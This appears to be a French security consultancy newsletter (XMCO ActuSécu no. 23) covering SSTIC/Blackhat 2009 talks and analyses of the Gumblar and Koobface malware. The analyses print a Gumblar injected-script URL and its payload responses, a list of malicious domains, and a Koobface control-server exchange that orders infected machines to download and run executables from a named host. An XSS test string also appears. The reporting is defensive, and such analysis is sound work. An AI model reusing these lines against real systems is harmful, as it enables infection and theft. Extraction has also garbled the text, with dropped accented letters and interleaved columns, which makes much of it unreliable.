communication du groupe avait refus l'utilisation de permanente phase de configuration. En effet, face la
slides, de peur que certaines images ne soient quantit importante de donnes analyser, toutes ne
dtournes... C'est donc devant un cran noir que celui- se rvlent pas forcment utiles. La plate-forme doit
ci nous a prsent les diffrents mcanismes, donc tre talonne au fur et mesure que des
procdures et autres risques lis l'intgration de nouveaux malwares sont analyss.
l'informatique et des nouvelles technologies.

Celui-ci a galement confirm que les ordinateurs de


bords ne fonctionnent pas sous Windows : les stations
Windows prsentes au sein du poste de pilotage sont

Photo : Cdric BLANCHER, Pierre CAPILLON, Sylvain SARMEJEANNE et Yvan VANHULLEBUS.


utilises pour distraire les pilotes et ne sont
videmment pas connectes Internet...

valuation de l'injection de code malicieux dans


une Java Card - Jean Louis Lanet (XLIM/
Universit de Limoges)

Il sest agit dune prsentation technique sur le


fonctionnement des JavaCard et les mcanismes de
scurit mis en place. Aprs une tude thorique des
techniques qui permettent de contourner ces
WWW.XMCOPARTNERS.COM
mcanismes, l'auteur a prsent les rsultats des tests
rels : la fuite d'information et l'injection de code
malicieux sont possibles.

Nanmoins, toutes les JavaCard ne se valent pas et les


cartes les plus rcentes sont plus solides. Enfin, Jean-
Louis Lanet a modr la porte de ces attaques en
prcisant que celles-ci seraient inefficaces sur les
prochaines gnrations de JavaCard.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![14]
BLACKHAT ET SSTIC 09 LACTU SCU N23

Le point de vue d'un WOMBAT sur les attaques Compromission physique par le bus PCI -
Internet - Marc Dacier (Symantec) Christophe DEVINE et Guillaume VISSIAN
(Thals)
Marc DACIER est venu prsenter le projet WOMBAT.
Ce projet financ par la Cour Europenne permet Comment prendre le contrle d'un systme en insrant
tous les internautes de rejoindre un Honeypot gant. une carte PCMCIA ? A linstar des vulnrabilits lies
Ce projet a pour but de recueillir, au niveau mondial, aux ports FireWire, les ports PCI permettent d'injecter
des informations sur les attaques et sur la propagation du code au sein du noyau. Christophe Devine, auteur
des vers. Ces informations publies permettent de du clbre aircrack, a ralis une "preuve de concept"
dterminer quelles attaques semblent cibles, ainsi que prenant la forme d'une carte PCMCIA. L'insertion de
l'volution de certaines attaques (exemple cette carte au sein d'un systme Windows a permis de
exploitation faille RPC DCOM sur le port 139 puis 135). modifier la fonction qui gre l'authentification. Il a
suffit de saisir n'importe quel mot de passe pour se
connecter sur la machine ! Comme pour la
Cinq questions sur la vraie utilit de l'ISO 27001 dmonstration de Loic Duflot, cette animation a cr
- Alexandre Fernandez-Toro (HSC) un effet certain...

Excellente prsentation autour d'une seule "relle"


question : qui et quoi sert rellement l'ISO27001 ?
(cette question peut tre tendue aux autres normes
comme le PCI-DSS...).

L'exprience dAlexandre Fernandez-Toro montre que

Photo : Cdric BLANCHER, Pierre CAPILLON, Sylvain


la certification ISO27001 ne modifie pas le niveau de
scurit d'une entreprise : soit elle faisait de la scurit
avant l'arrive de ces normes, soit l'entreprise dcouvre

SARMEJEANNE et Yvan VANHULLEBUS.


la scurit en mme temps que la norme. Est-ce que
les nouveaux mcanismes et les processus mis en
oeuvre seront respects dans le temps ?
Photo : Cdric BLANCHER, Pierre CAPILLON, Sylvain SARMEJEANNE et Yvan

ACPI et routine de traitement de la SMI: des


limites l'informatique de confiance ? - Loic
DUFLOT et Olivier LEVILLAIN (DCSSI)
WWW.XMCOPARTNERS.COM

La prsentation a commenc par une dmonstration


impressionnante. L hypothse de dpart consiste en
une backdoor au sein du gestionnaire d'alimentation
ACPI qui attend un signal particulier pour s'activer.
Ensuite, comme par magie, Loic DUFLOT a dbranch
puis rebranch 5 fois de suite le cble d'alimentation de
son ordinateur portable, la backdoor s'est active et lui
a permis d'obtenir un accs d'administration "root".
VANHULLEBUS.

Limpressionnante introduction a t suivie dune


prsentation des dtails techniques de l'attaque.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![15]
BLACKHAT ET SSTIC 09 LACTU SCU N23

Fuzing : 3 prsentations Rump session

* Fuzzing : le pass, le prsent et le futur - Ari Takanen - Cette journe s'est termine par l'invitable Rump
Cod Sessions : des sances durant lesquelles des speakers
* Fuzzgrind : un outil de fuzzing automatique - Gabriel disposent de 4 minutes pour prsenter un sujet. Au
CAMPANA - SOGETI ESEC total, plus d'une vingtaine de prsentations de qualit,
* Scurit des architectures de Convergence Fixe- toutes disponibles sur le Web. Les diffrents sujets
Mobile - Laurent BUTTI traitaient du forensic, du CredSSP, de linjection XPath,
de la mise disposition d'une image VMWARE du
Les trois premires prsentations du second jour challenge Securitech, des attaques sur Windows Mobile
portaient sur le fuzzing, technique de recherche de 6, des prcisions sur le vocabulaire RFC ne pas
vulnrabilits par stress des entres. Les diffrents utiliser ou viter, de la scurit du gnrateur de
interlocuteurs ont pu prsenter des outils/framework passphrases alatoires WPA/WPA2 de certaines box
pour de raliser ce type d'analyse sur des programmes ADSL, etc.
ou des services rseau. Les prsentations les plus marquantes ne concernaient
pas directement la scurit mais plutt l'alcotest USB
de Denis Bodor et Sebastien Tricaud (Linux Mag), ou
Pourquoi la scurit est un chec (et comment y comment prouver l'efficacit des bonbons "arlequins".
remdier ?) - Nicolas RUFF (EADS) Une des premires applications proposes tait le
couplage l'authentification des dveloppeurs pour
Comme son habitude, Nicolas Ruff a fait dun sujet limiter certaines erreurs de dveloppement... Une autre
non technique une des meilleures confrences de la dmonstration, prsente par Nicolas Collignon (HSC)
SSTIC. Avec son aisance habituelle et son humour, concernait le concept de "Shell Over DTMF". Il a
Nicolas Ruff a dress un constat sur le monde de la dmontr la possibilit de contrler une backdoor sur
scurit informatique. Malgr le commerce et la un IPBX Asterisk depuis un tlphone par l'envoi de
recrudescence d'quipements ddis la scurit squences DTMF (touches du clavier tlphonique)
informatique, il est toujours aussi trivial d'exploiter tout en obtenant le rsultat de la commande
des failles de scurit au sein des entreprises. L'auteur vocalement.
a fini sa dmonstration en donnant des pistes de
solutions simples : avant tout, il faut du courage et des Rejoignant les ides exposes par Nicolas Ruff et
comptences. Ne serait-il donc pas plus efficace indign de constater qu'une mauvaise gestion des
dallouer de plus gros budgets pour des employs habilitations pouvait engendrer de lourdes
comptents plutt que pour des solutions scurit consquences (par exemple: un compte de test associ
inefficaces? un mot de passe trivial inclut un groupe

...un de nos consultants, Yannick Hamon,


d'administration), Yannick Hamon, consultant XMCO, a
prsent les prmices du projet IMA. Cet outil gratuit,
ddi la gestion des habilitations (Domaine Windows,
a prsent les prmices du projet IMA. Cet Bases de donnes MS SQL, Systmes Linux...), fera
outil gratuit est ddi la gestion des l'objet d'une prsentation dtaille au sein d'un prochain
habilitations... numro de l'ActuSecu.
WWW.XMCOPARTNERS.COM

Confrence invite - Projet SEC&SI


Sylvain SARMEJEANNE et Yvan VANHULLEBUS.
Photo : Cdric BLANCHER, Pierre CAPILLON,

Prsentation d'un projet visant fournir un Systme


d'Exploitation Scuris pour "Mme Michu" pour dclarer
ses impts et naviguer sur Internet de faon scurise.

Ce projet a mis en concurrence 3 quipes qui ont du,


en outre, auditer les solutions concurrentes et y dceler
les failles de scurit. La prsentation de la dernire
quipe s'est d'ailleurs termine sur une dcouverte en
direct d'un problme de scurit....

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![16]
BLACKHAT ET SSTIC 09 LACTU SCU N23

"<script>alert('XSS')</script> -- Sous-titre : Conclusion


XSS : de la brise l'ouragan - Pierre GARDENAT
(Acadmie de Rennes) Aprs avoir assist la Blackhat et au SSTIC, nous
pouvons confirmer que nos consultants et nos
La journe commence par une prsentation dynamique chercheurs franais n'ont rien envier aux
du XSS. Le constat est le suivant : bien que ce type de speakers de la Blackhat ! Les prsentations sont
faille soit connu, peu de sites y chappent. L'auteur d'ailleurs plus techniques mme si elles gardent un
s'est principalement intress aux sites ct un peu trop "recherche" pure.
communautaires tels que Facebook ou MySpace.
D'ailleurs, une des dmonstrations se passent de Quoi qu'il en soit, les sujets de la SSTIC deviennent
commentaires : le site de MySpace prsente un de plus en plus intressants avec des
formulaire HTML qui indique clairement de ne pas dmonstrations vraiment bien menes... Bravo!
insrer de code HTML/JavaScript dans un des champs.

De son ct, Facebook subit actuellement la foudre de


pirates avec la sortie du mois des vulnrabilits

INFO
Facebook (http://theharmonyguy.com/).

Origami malicieux en PDF - Fred RAYNAL, Le site d'Apache pirat


Guillaume DELUGRE et Damien AUMAITRE
(Sogeti)
Le site web www.apache.org utilis pour
Le rdacteur du chef du magazine MISC a prsent tlcharger les versions du serveur web
Apache a t compromis.
des vulnrabilits lies l'un des formats de documents
les plus rpandus : le PDF. De l'exploitation de A la fin du mois d'aot, des pirates se
vulnrabilits au sein du lecteur, au contournement du sont introduits au sein des serveurs en
mcanisme de signature en passant par l'excution exploitant un problme de clefs SSH (vol
silencieuse de code malicieux via un PDF, cette tude d'une clef SSH permettant d'effectuer
dmontre qu'un document PDF n'est pas une source des sauvegardes). En effet, un compte
sre. tait utilis pour sauvegarder certaines
donnes via une authentification par
clef SSH.
Macaron, une porte drobe pour toutes les Ds la dcouverte du problme, les
applications JavaEE - Philippe PRADOS (Atos administrateurs ont immdiatement coup
Origin) l'accs aux serveurs. Selon les
premires informations, aucune source ni
Prsentation d'une preuve de concept de backdoor au excutable disponibles sur le site
sein d'applications J2EE. L'auteur dcrit son projet n'auraient t altrs. Les pirates
auraient uniquement upload des scripts
MACARON comme une archive JAR qui offre de
CGI...
nombreuses fonctionnalits. Il finit sa prsentation sur
les solutions possibles et la mise disposition d'un outil Apache recommande cependant de vrifier
facilitant leur intgration. les signatures numriques fournies pour
WWW.XMCOPARTNERS.COM

chacun des fichiers tlchargs depuis


Apache.org.

Webographie SSTIC

[1] Actes
http://actes.sstic.org/SSTIC09/
http://sid.rstack.org/blog/index.php/347-sstic-2009-en-
direct-ou-presque

[2] Rump
http://actes.sstic.org/SSTIC09/Rump2009/

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![17]
LACTU SCU N23

GUMBLAR ET LES Lattaque Gumblar

REDIRECTIONS JAVASCRIPT Du mois de mars mai 2009,


une nouvelle vague dattaques
similaires aux attaques
dinjection diframes en
2008, a t lance.

Baptise Gumblar, cette


attaque a permis dinfecter
un grand nombre dordinateurs
via lexploitation de
vulnrabilits des
logicielsAdobe Acrobat
Reader et Flash.

Nous avons tent de faire le


tour de cette menace qui
persiste lheure mme o
nous crivons cet article

Adrien GUINAULT
XMCO | Partners

Prsentation Le dbut de lattaque et linfection massive de


sites web lgitime
Le terme Gumblar a t utilis pour la premire fois au
mois de mars 2009. Revenons quelques mois en arrire.
Ce mot provient du nom de domaine gumblar.cn
utilis par des pirates dorigine chinoise et russe pour Au mois de Mars 2009, un grand nombre dinternautes
hberger des pages web malicieuses. ont t infects, un rythme alarmant, la suite dune
navigation sur des sites web lgitimes. la vue des
Sous ce nom trange se cache une attaque mene plaintes grandissantes, les chercheurs en scurit ont
grande chelle. Elle a permis de diffuser un virus par le commenc sintresser au problme et de
biais de liens malicieux insrs au sein dun grand potentielles vulnrabilits 0-days.
nombre de pages web pralablement compromises.
Aprs lanalyse du code de plusieurs sites lgitimes,
Gumblar peut donc se dfinir comme le terme gnral suspects davoir t compromis par des pirates, un
de lattaque, mais galement comme le code javascript bout de code javascript est alors identifi. Ce dernier
malveillant (Troj/JSRedir-R ) inject au sein de ces sites met en vidence vers plusieurs domaines, dont le
WWW.XMCOPARTNERS.COM

web lgitimes. Ce code a un unique but : rediriger les fameux gumblar.cn qui deviendra ensuite
visiteurs vers des sites web contrls par des pirates. martuz.cn.
Ceux-ci tentent dexploiter des vulnrabilits dAcrobat
Reader, Flash/Shockwave ou dinciter tlcharger un Prs de 1500 sites web auraient t compromis de la
excutable vrol. sorte, toujours dans le mme but : insrer un code
m a l i c i e u x . Te n n i s . c o m , v a r i e t y. c o m ,
Ce type dattaque, baptis drive by download svit Coldwellbanker.com ou encore des sites franais
depuis quelques annes, avec notamment, la fameuse comme pronopsg.com ou psgteam.net font partie des
injection dIframe en avril 2008. sites victimes.

Linfection de plusieurs milliers de sites web a permis


une diffusion rapide et efficace du code malveillant.
Comment les pirates sy sont-ils pris?

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!! [18]
GUMBLAR ET LES REDIRECTIONS JAVASCRIPT LACTU SCU N23

La premire hypothse repose sur une attaque massive Analyse du code javascript malicieux insr
dinjection SQL (comme lors des dernires attaques
dinjection dIframes). Il est probable que les pirates Aprs cette brve prsentation, rentrons maintenant
soient donc parvenus exploiter en masse ce type de dans le vif du sujet avec des dtails plus techniques.
faille afin de modifier le code source de certaines pages
web. lheure o nous crivons cet article, de nombreux
sites sont encore infects. Aprs quelques recherches
sur Google, nous tombons justement sur un site
contenant un code javascript trange.

La deuxime hypothse est que les pirates aient pu


compromettre plusieurs hbergeurs afin de polluer en
masse de nombreux sites web... Une hypothse qui se
rvle peu probable vu la diversit des domaines
infects.

Enfin, des tudes ont dmontr que la plupart des sites Ce site, lapparence lgitime, contient en fait le code
infects taient dvelopps en PHP (dont des forums en question.
phpbb, SMF, vBulletin et Wordpress 2.7.1, etc.). Des
failles propres ces logiciels seraient une des voies
dinfection, mais trs peu dinformations sont
Selon Websense, le 6 Mai, prs de 22
disponibles ce suje 000 sites taient infects par Gumblar, et
prs de quatre fois plus deux semaines
Selon Websense, le 6 mai, prs de 22000 sites taient
plus tard...
infects par Gumblar et prs de quatre fois plus deux
semaines plus tard, soient 80000 sites web touchs par En regardant de plus prs le code source, nous
cette attaque (le graphique suivant est issu du blog de obtenons le code suivant:
WebSense).

WWW.XMCOPARTNERS.COM

La fonction commence avec les caractres (function(


ce qui signifie que cette dernire ne possde pas de
nom. Largument utilis la fin du code (/>/g) est
remplac par % tout au long de la fonction laide de la
fonction replace.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![19]
GUMBLAR ET LES REDIRECTIONS JAVASCRIPT LACTU SCU N23

En remplaant le caractre > par % puis en Linfection des visiteurs


convertissant le code hexadcimal, on obtient le code
dcod suivant : Une fois le site visit par un internaute, le navigateur
excute le script (src=//gumblar.cn/rss/?id=2X)
charg partir dun domaine tiers. En fonction du
navigateur, plusieurs fichiers sont proposs la victime.

Voici les diffrents payloads utiliss par les pirates en


fonction de lURL et de la valeur du paramtre id
envoy:

src=//gumblar.cn/rss/?id=2 :
le serveur contrl par les pirates renvoie:

REPONSE HTTP :
Ce code javascript permet deffectuer un contrle sur le Content-Disposition: inline; filename=XXXX.pdf
type de navigateur (userAgent) utilis par des visiteurs. Content-Transfer-Encoding: binary
Dans le cas dun systme Windows, un autre code Connection: close
javascript issu du site gumblar.cn est excut Content-Type: application/pdf
silencieusement. Ce script possde en paramtre un ID
qui permettra aux pirates dutiliser diffrents payloads
prsents dans le prochain paragraphe. Fichier PDF

Il faut noter que la premire version du code javascript src=//gumblar.cn/rss/?id=3 (fichier flash SWF):
ntait pas masque. Mais les pirates ont vite compris le serveur contrl par les pirates renvoie:
lintrt de cacher une partie du code pour viter
certains outils de scurit. On peut quand mme douter
du professionnalisme de ces pirates, car les mthodes
de dissimulation mises en place sont simples et REPONSE HTTP :
vraiment faciles dcoder.
Content-Disposition: inline; filename=XXXX.swf
Lorsqu'un utilisateur visite un site Content-Transfer-Encoding:binary
Connection: close
infect, des fichiers PDF, Flash et EXE sont Content-Type: application/x-shockwave-flash
alors proposs l'utilisateur et tentent
d'exploiter les vulnrabilits connues...
Fichier Flash SWF
En ce qui concerne les domaines utiliss, seuls les
src=//gumblar.cn/rss/?id=11(fichier EXE) :
sites gumblar.cn et martuz.cn taient utiliss par les
le serveur contrl par les pirates renvoie:
pirates au dbut. Au fur et mesure de la fermeture de
WWW.XMCOPARTNERS.COM

ces derniers, dautres domaines ont rapidement vu le


jour:
REPONSE HTTP :
utobestwestern.cn, bestlotron.cn, betbigwager.cn,
denverfilmdigitalmedia.cn, educationbigtop.cn, Content-Disposition: inline; filename=XXXX.exe
filmtypemedia.cn, finditbig.cn, greatbethere.cn, Content-Transfer-Encoding:binary
hotslotpot.cn, liteautotop.cn, litebest.cn, Connection: close
litegreatestdirect.cn, litetopdetect.cn, lotbetsite.cn, Content-Type: application/octet-stream
lotwageronline.cn, mediahomenamemartvideo.cn,
nameashop.cn, perfectnamestore.cn, playbetwager.cn,
bestfindaloan.cn, finditbig.cn, litetopdetect.cn,
Fichier EXE
litetopfindworld.cn....

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![20]
GUMBLAR ET LES REDIRECTIONS JAVASCRIPT LACTU SCU N23

Ces fichiers PDF, Flash ou EXE tentent alors dexploiter


des vulnrabilits connues et publies entre 2007 et
2009 afin dinstaller un malware sur le poste de la
victime.

* Vulnrabilit Adobe Acrobat Reader JBIG (versions


INFO
affectes : infrieures 9.1, 8.1.3 et 7.1.1) : Le site d'Adobe propose ses utilisateurs
une version obsolte de la visionneuse PDF
http://cve.mitre.org/cgi-bin/cvename.cgi? Adobe Reader
name=CVE-2009-0927
http://www.adobe.com/support/security/bulletins/
apsb08-11.html Un problme a t dtect au sein du
site Internet d'Adobe, qui permet de
tlcharger les dernires versions de
noter : les fichiers PDF malicieux qui exploitent la nombreux logiciels tels qu'Adobe Flash
vulnrabilit JBIG2 ne sont toujours pas dtects par Player, Adobe Reader, etc.
certains antivirus du march.
En effet, la version d'Adobe Reader
distribue n'est pas la plus rcente
(9.1.0 et non pas la 9.1.2, dernire en
date).

Cette version 9.1.0 est vulnrable de


nombreuses failles de scurit,
exploites sur Internet par le biais de
fichiers PDF.

Adobe indique que ce problme n'est pas


important puisqu'une fois tlcharg sur
le poste client, l'outil de mise jour
automatique va tlcharger la dernire
version. On peut considrer que cette
rponse nest pas optimale dun point de
vue puriste.

Les malwares injects

Comme nous lavons vu, une fois que les vulnrabilits


* Vulnrabilit Adobe Acrobat Reader via de longs des logiciels Acrobat Reader et Shockwave sont
arguments passs certaines mthodes javascript exploites, un payload est inject. Il permet de
(versions affectes : infrieures 8.1.1) : tlcharger et dexcuter un virus. Ce dernier est
WWW.XMCOPARTNERS.COM

aujourdhui dtect par tous les antivirus (Troj/Daonol-


http://cve.mitre.org/cgi-bin/cvename.cgi? Fam).
name=2007-5659
http://www.adobe.com/support/security/advisories/ Nous ne rentrerons pas dans l'analyse de ces codes
apsa08-01.html viraux, si ce nest que le malware opre via plusieurs
axes.
* Active X WordViewer.ocx : Dans un premier temps, ce dernier dtourne (hook) les
fonctions de la DLL WS2_32.dll afin dcouter le trafic
http://cve.mitre.org/cgi-bin/cvename.cgi? rseau. Cette technique permet de voler tous les mots
name=CVE-2007-2496 de passe saisis par la victime. Ces comptes seront
ensuite envoys aux pirates qui utiliseront ces
identifiants pour compromettre de nouveaux sites et
largir ainsi leur champ d'action.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![21]
GUMBLAR ET LES REDIRECTIONS JAVASCRIPT LACTU SCU N23

A linstar de Conficker, une fonction de blacklist de mots


clefs (Adob, DaonolFix, bleepingcomputer, clamav,
mbam, mcafee, miekiemoes, prevx) a implmente afin
dinterdire laccs quelques sites.

De plus, le virus installe galement un proxy local sur le


port 7171 afin despionner les recherches effectues
dans Google. Ainsi, les pages de rsultats Google sont
totalement modifies, et ce afin de diriger linternaute
vers des sites choisis par les attaquants.

Pour finir, une fonction de SPAM est paralllement


active. Le virus peut servir de cheval de Troie et
permettre la prise de contrle distance du poste
infect.

Conclusion

Ce type dattaque na rien de nouveau. Linjection


diFrame au sein de sites web pirats via des
attaques dinjection SQL est trs en vogue depuis 2
ans. Gumblar est donc un exemple parmi tant
dautres qui, esprons-le, incitera nos chers
administrateurs/Webmasters maintenir leurs
systmes jour, un jour peut-tre...

Webographie

Analyses diverses de Gumblar :

http://securitylabs.websense.com/content/Blogs/
3401.aspx

http://www.australianwebmaster.com/showthread.php?
t=2633

http://mad.internetpol.fr//archives/44-Daonol-Gumblar-
Miekiemoes-is-a-superstar.html
WWW.XMCOPARTNERS.COM

http://www.martinsecurity.net/2009/05/20/inside-the-
massive-gumblar-attacka-dentro-del-enorme-ataque-
gumblar/

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![22]
LACTU SCU N23

Koobface, un autre ver la mode...

Le succs des rseaux sociaux est


aujourdhui incontestable. En
loccurence, Facebook est devenu le
4me site le plus visit sur internet
depuis le dbut de lt. Avec 340
millions dutilisateurs uniques en
juin 2009 et une croissance de 157%
sur un an, Facebook devance dsormais
Wikipdia. Les seuls sites lui
rsistant sont les trois moteurs de
recherche : Google, Microsoft et
Yahoo.
" Cest donc tout naturellement
que les rseaux sociaux deviennent de
nouveaux vecteurs de propagation pour
les malwares. Koobface est le premier
malware qui exploite pleinement, et de

KOOBFACE, LE MALWARE
manire plus que russie, les
avantages de ces plates-formes
communautaires.

QUI CHERCHAIT DES AMIS Lin Miang JIN


XMCO | Partners

Koobface, Kezako ? "Wow ! C'est vraiment toi dans cette vido ?"

Koobface, anagramme de Facebook , est apparu il y Hlas, les fameux messages "Eh, une photo de toi" ou
a aujourdhui plus dun an sur les deux sites encore "lol, trop drle la vido de toi" sont - encore et
communautaires les plus populaires, MySpace et toujours - utiliss par les pirates pour infecter leurs
Facebook. Ce malware, quon peut aussi bien qualifier victimes trop curieuses et insouciantes.
de ver que de virus, est toujours actif. Cest cette dure La technique d'infection est simple : un message de
de vie qui impressionne les spcialistes. Au lieu de spam est diffus travers Facebook, Twitter ou autres,
faiblir avec le temps (et avec les actions des diteurs laide de comptes pralablement compromis ou
dantivirus), linfluence de Koobface grandit et il adresse malveillants. Ce message est bien videmment
dsormais 10 rseaux sociaux diffrents (Facebook, accrocheur, ou tente de ltre, et contient un lien vers
MySpace, Twitter, Hi5, etc). une vido.
noter que le message malveillant peut aussi bien tre
diffus sur sa page de profil, quenvoy en message
La dure de vie de Koobface priv.
impressionne les spcialistes. Au lieu de
WWW.XMCOPARTNERS.COM

faiblir avec le temp, linfluence


deKoobface grandit et il adresse
dsormais 10 rseaux sociaux diffrents
Facebook, MySpace, Twitter, Hi5...

Koobface nest pas quun simple ver ou un virus ; cest


galement un botnet. Les machines infectes sont
transformes en machine zombies qui reoivent des
ordres de la part des pirates du groupe Koobface .

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!! [23]
KOOBFACE, LE MALWARE QUI CHERCHAIT DES AMIS LACTU SCU N23

En cliquant sur le lien malveillant, linternaute est Les internautes attentifs sapercevront cependant que
redirig vers un site usurpant lidentit dun site lgitime l e s i t e n e s a p p e l l e p a s Yo u t u b e , m a i s
tel que Youtube ou Facebook. Ci-dessous, le code Yuotube...classique...
javascript utilis par la page visite par la victime :

Illustration faux site YouTube

Le site indique alors la victime que sa version du


Player Flash ne lui permet pas de visionner la vido, et
quil doit donc tlcharger une soi-disant mise jour qui
correspond en fait au programme d'installation de
Koobface.

Koobface grandit et adresse dsormais


10 rseaux sociaux diffrents (facebook,
MySpace, Twitter, Hi5...)..
Illustration faux site Facebook

WWW.XMCOPARTNERS.COM

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![24]
KOOBFACE, LE MALWARE QUI CHERCHAIT DES AMIS LACTU SCU N23

Koobface en dtails... Ci-contre se trouve la requte du downloader Koobface,


avec dans le corps du message, les informations
Composition rcoltes sur les rseaux sociaux frquents par la
victime. Ci-dessous, on retrouve la rponse
Contrairement la grande majorit des malwares qui correspondante du serveur de contrle avec les actions
regroupent leurs fonctionnalits dans un unique fichier, raliser dans le corps du message :
Koobface se compose de plusieurs modules, chacun
ayant sa propre utilit :
HTTP/1.1 200 OK
Linstalleur de Koobface, ou Downloader
Les composants de propagation sur rseau social #PID=8173
Le serveur web START|http://www.osftp.yoyo.pl/1/6244.exe
Le casseur de CAPTCHA STARTONCE|http://www.osftp.yoyo.pl/1/nfr.exe
Le voleur de donnes WAIT|120
Le composant de dtournement de recherches #BLACKLABEL
webs EXIT
Le DNS Changer
Linstalleur de faux antivirus

Les modules de propagation sur rseau social


L'installeur peuvent tre considrs comme le ver Koobface .
En effet, ce sont ces derniers qui sont responsables de
Linstalleur Koobface est le premier intervenir dans l'envoi des messages via le profil des utilisateurs
linfection. Comme son nom lindique, une fois infects. Chaque rseau social a un module qui lui est
tlcharg et excut par lutilisateur, ili va installer le ddi. Ce module va contacter le serveur de contrle
malware sur la machine de la victime. Linstallateur va afin de rcuprer les messages et les liens poster sur
en ralit se copier, lancer sa copie, puis seffacer de la la plate-forme communautaire quil devra envoyer aux
machine. amis de la victime.

Chaque rseau social dispose dun


composant qui lui est ddi. Ce
composant va contacter le serveur de
contrle afin de rcuprer les messages et
les liens poster sur la plate-forme
communautaire ...
Ainsi en place, le malware va dterminer les rseaux
sociaux frquents par la victime laide des cookies
Internet. Il va ensuite se connecter son serveur de Koobface installe silencieusement un mini-serveur
contrle (C&C) afin denvoyer les informations web sur le poste de ses victimes et transforme alors
rcoltes, puis va tlcharger les diffrents composants leurs machines en bot : chaque machine va pouvoir
WWW.XMCOPARTNERS.COM

que ce dernier va lui indiquer. Le downloader va, entre son tour distribuer les diffrents composants de
autres, tlcharger les composants correspondants aux Koobface. Elle pourra galement hberger les faux
plates-formes dont la victime est adepte. sites (Youtube, Facebook) qui contiennent linstalleur
Koobface.

POST /ld/gen.php HTTP/1.1 Depuis fin juillet 2009, ce mini-serveur web peut
potentiellement transformer la machine en serveur
f=0&a=1812198572&v=08&c=0&s=ld&l=8173& relais pour les ordres donner au botnet. Cette
ck=0&c_fb=0&c_ms=0&c_hi=0&c_be=0&c_fr= nouvelle caractristique est probablement une rponse
-1&c_yb=-1&c_tg=0&c_nl=0&c_fu=-1 aux nombreuses fermetures des noms de domaines
employs par Koobface. Cette modification permet ainsi
Koobface de devenir insensible la fermeture de ses
diffrents noms de domaines grce une architecture
P2P.
Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est
strictement interdite. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![25]
KOOBFACE, LE MALWARE QUI CHERCHAIT DES AMIS LACTU SCU N23

Le module casseur de CAPTCHA permet de rsoudre Le module voleur de donnes est une variante du
les CAPTCHA (tests permettant de diffrencier les malware TROJ_LDPINCH. Ce dernier va rechercher
humains des machines - cf Actu-scu n19) prsents sur la machine infecte les cls des produits Microsoft,
sur de nombreux sites. Ces derniers permettent les identifiants des comptes mails, des messageries
notamment dviter les messages de spam dans les instantanes, des FTP, les profils Internet, etc. Les
commentaires sur des sites web. Ils permettent donnes rcupres sont ensuite chiffres avant dtre
notamment dviter la cration de comptes fictifs par renvoyes au serveur de contrle du malware.
des automates sur diffrents sites communautaires. Chose intressante, lexcutable est souvent dissimul
au sein dune image .JPG qui est stocke sur un
clbre site dhbergement dimages.

Le module de dtournement des recherches web va


intercepter les requtes envoyes Google, Yahoo,
MSN Ask, ou Live (aujourdhui devenu Bing), et va les
rediriger vers des moteurs de recherche malveillants.
Les rponses ainsi obtenues peuvent tre plus que
douteuses...

De manire plus gnrale que le composant prcdent,


Koobface installe galement un DNS Changer. Pour
rappel, un serveur DNS sert rsoudre des noms de
domaines, cest--dire faire la correspondance entre
une URL et une adresse IP. Ce composant va modifier
le serveur DNS de la machine infecte pour la faire
Contrairement ce que lon pourrait penser, ce ne sont pointer vers un serveur DNS malveillant. Ce dernier
pas les ressources de la machine infecte qui vont tre peut ainsi empcher lutilisateur daccder certains
exploite. Une fois de plus, cest lutilisateur qui va sites (ex: site de scurit, site dantivirus).
tre mis profit pour casser le captcha : cest un
botnet 2.0 ! Le composant va chercher, sur le serveur
de contrle, limage du CAPTCHA rsoudre, puis va
la prsenter lutilisateur sous la forme dune fentre
Windows. Cette fausse fentre indique quil est
ncessaire de rsoudre le CAPTCHA dans le temps
INFO
imparti sous peine de voir sa machine steindre. Koobface en chiffre...

Nanmoins, la machine ne va pas steindre si le temps


est coul. En effet, le temps indiqu sur le faux-
CAPTCHA est en fait li la dure de validit dudit
10
Nombre de 10 rseaux sociaux attaqus.
CAPTCHA sur le site partir duquel il a t rcupr.

Lutilisation que fait KoobFace de ses captchas nest 40


pas trs claire. Il est possible que ce service soit Nombre de messages distincts utiliss
WWW.XMCOPARTNERS.COM
revendu comme un service temps-rel pour des pour inciter les victimes suivre le
spammers. lien malicieux.

10000
De mme, Koobface ne fait pas de relle vrification
sur la rponse de lutilisateur. Koobface implmente
une simple vrification base sur des expressions Nombre de variantes de Koobface
rgulires. Par exemple, si limage se compose de deux dtectes en septembre 2009 selon
mots rsoudre, Koobface va seulement vrifier si Kaspersky.
lutilisateur a bien saisi deux mots. Si ce nest pas le
cas, un message derreur est affich. Sinon la rponse
est renvoye au serveur de contrle. 111337
Nombre de blogs qui redirigent vers une
page contenant le ver.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


